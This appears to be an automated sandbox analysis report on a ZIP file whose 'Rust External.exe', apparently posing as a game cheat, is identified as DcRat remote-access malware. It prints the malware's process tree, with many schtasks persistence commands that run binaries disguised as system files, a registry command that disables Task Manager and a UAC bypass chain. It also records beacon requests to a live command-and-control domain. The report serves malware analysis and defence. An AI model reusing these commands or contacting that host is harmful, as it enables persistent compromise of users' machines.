Analysis

  • max time kernel
    72s
  • max time network
    62s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/01/2025, 20:09 UTC

General

  • Target

    lithium external.zip

  • Size

    2.5MB

  • MD5

    5abaa60461ee4c19647911a8d9a0006a

  • SHA1

    76cc97f0581d174087f96f058d898b42e8c566a2

  • SHA256

    1605702f0909585b220918e1cbd6b236f5c47714a978990c7d5b43504b90163d

  • SHA512

    93f3d6b3849a2d9c5b81e9fd96cc60d065e5916ff470e974f2b9b5f49462f25ea18b1f4f32c1fe4f3a3c05eb214e1d5e0f6f25f443a5bb3d338eed2471c0f4f3

  • SSDEEP

    49152:aBIg2+HpqXdLYyrF7SUZSiwaJXA78bixRz4S87jaeg7hRFIz39O:o0NLLFSaJsxR4So+eg7hczA

Malware Config

Signatures

  • DcRat

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 48 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 12 IoCs
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 11 IoCs
  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • System policy modification 1 TTPs 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lithium external.zip"
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Agentcomponentdriver\PortDll.exe
            "C:\Agentcomponentdriver\PortDll.exe"
            5⤵
            • UAC bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:3300
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KjrLCSMPDQ.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:1456
                • C:\Users\Default User\services.exe
                  "C:\Users\Default User\services.exe"
                  7⤵
                  • UAC bypass
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2592
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36f4394c-bc31-4c88-aa13-67d0f187b9e5.vbs"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:740
                    • C:\Users\Default User\services.exe
                      "C:\Users\Default User\services.exe"
                      9⤵
                      • UAC bypass
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      • System policy modification
                      PID:3568
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ef5a38b-c1c4-4630-8c9b-7b738a718e49.vbs"
                        10⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4896
                        • C:\Users\Default User\services.exe
                          "C:\Users\Default User\services.exe"
                          11⤵
                          • UAC bypass
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3412
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6bbac697-2e07-4ead-8da0-d093ab0a0e98.vbs"
                            12⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2856
                            • C:\Users\Default User\services.exe
                              "C:\Users\Default User\services.exe"
                              13⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5032
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ab3f168-732d-4d14-a5da-db7f6df85643.vbs"
                            12⤵
                              PID:3956
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3bd2fcca-730f-4671-9571-452db9c63f2b.vbs"
                          10⤵
                            PID:3440
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6dcd6085-0ac4-4210-aedb-7337dfc48147.vbs"
                        8⤵
                          PID:3992
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4684
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Agentcomponentdriver\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3084
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Agentcomponentdriver\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Agentcomponentdriver\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4252
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Templates\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2644
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:880
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1576
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4100
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3484
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:228
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Agentcomponentdriver\Idle.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1572
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Agentcomponentdriver\Idle.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2296
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Agentcomponentdriver\Idle.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1672
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Agentcomponentdriver\smss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4408
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Agentcomponentdriver\smss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:404
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Agentcomponentdriver\smss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4484
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3168
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5116
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4896
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4160
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3092
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Recent\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5060
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Recent\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2300
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Recent\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4676
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2648
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4632
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3316
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Windows\Fonts\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2028
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\Fonts\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2064
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\Fonts\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4368
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1476
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4612
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4692
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2936
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3968
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\PrintHood\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\services.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4500
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4344
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2944
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM7" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4940
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM7" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2488
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Agentcomponentdriver\wininit.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3504
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Agentcomponentdriver\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1140
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Agentcomponentdriver\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3220
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Agentcomponentdriver\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4584
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Agentcomponentdriver\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2160
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Agentcomponentdriver\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1900
          • C:\Windows\System32\rundll32.exe
            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            1⤵
              PID:428
            • C:\Users\Admin\Downloads\Rust External.exe
              "C:\Users\Admin\Downloads\Rust External.exe"
              1⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:836
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                2⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4180
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1660
                  • C:\Agentcomponentdriver\PortDll.exe
                    "C:\Agentcomponentdriver\PortDll.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3936
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4104
            • C:\Users\Admin\Downloads\Rust External.exe
              "C:\Users\Admin\Downloads\Rust External.exe"
              1⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2892
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                2⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3780
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3648
                  • C:\Agentcomponentdriver\PortDll.exe
                    "C:\Agentcomponentdriver\PortDll.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:628
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:2560
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /7
              1⤵
                PID:1736
              • C:\Users\Admin\Downloads\Rust External.exe
                "C:\Users\Admin\Downloads\Rust External.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:4132
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:908

Network

  • flag-us
    DNS
    29358cm.darkproducts.ru
    services.exe
    Remote address:
    8.8.8.8:53
    Request
    29358cm.darkproducts.ru
    IN A
    Response
    29358cm.darkproducts.ru
    IN A
    172.67.194.232
    29358cm.darkproducts.ru
    IN A
    104.21.12.142
  • flag-us
    GET
    http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
    services.exe
    Remote address:
    172.67.194.232:80
    Request
    GET /L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy HTTP/1.1
    Accept: */*
    Content-Type: text/javascript
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 29358cm.darkproducts.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 20:09:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
    Accept-Ranges: bytes
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7tvzzSuBccEKgthy%2BocxvMDTWi5vkrBCe9w2OghaSCcm72CdJv6Ro4xBWRghCv5ZSfHn6%2BuiNY7bZrv091PBQHCOLuMpgRlknPL6yQfliabunJYTi1w7cZxViEPq%2B3Ko%2FDBhan%2ByR2tag%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 908324776fc7f1b6-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44961&min_rtt=44961&rtt_var=22480&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    GET
    http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
    services.exe
    Remote address:
    172.67.194.232:80
    Request
    GET /L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy HTTP/1.1
                Accept: */*
                Content-Type: text/javascript
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:46 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24I88SuywA5TJ0ttEmKRH2DK49J8xYD1dRdkz2SWNi0oV1CRhYoGiWLyoQto4inAaDJhy0NCag3xauYBgyzmQus13YJQLhKHFwu0uO3TJ5uQ1IB%2FLuLZaonQeO8BUZAJE3QRux91xxhSNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90832481af0ef1b6-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=47347&min_rtt=31696&rtt_var=23345&sent=14&recv=10&lost=0&retrans=1&sent_bytes=12576&recv_bytes=918&delivery_rate=171084&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                DNS
                232.194.67.172.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.194.67.172.in-addr.arpa
                IN PTR
                Response
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                services.exe
                Remote address:
                172.67.194.232:80
                Request
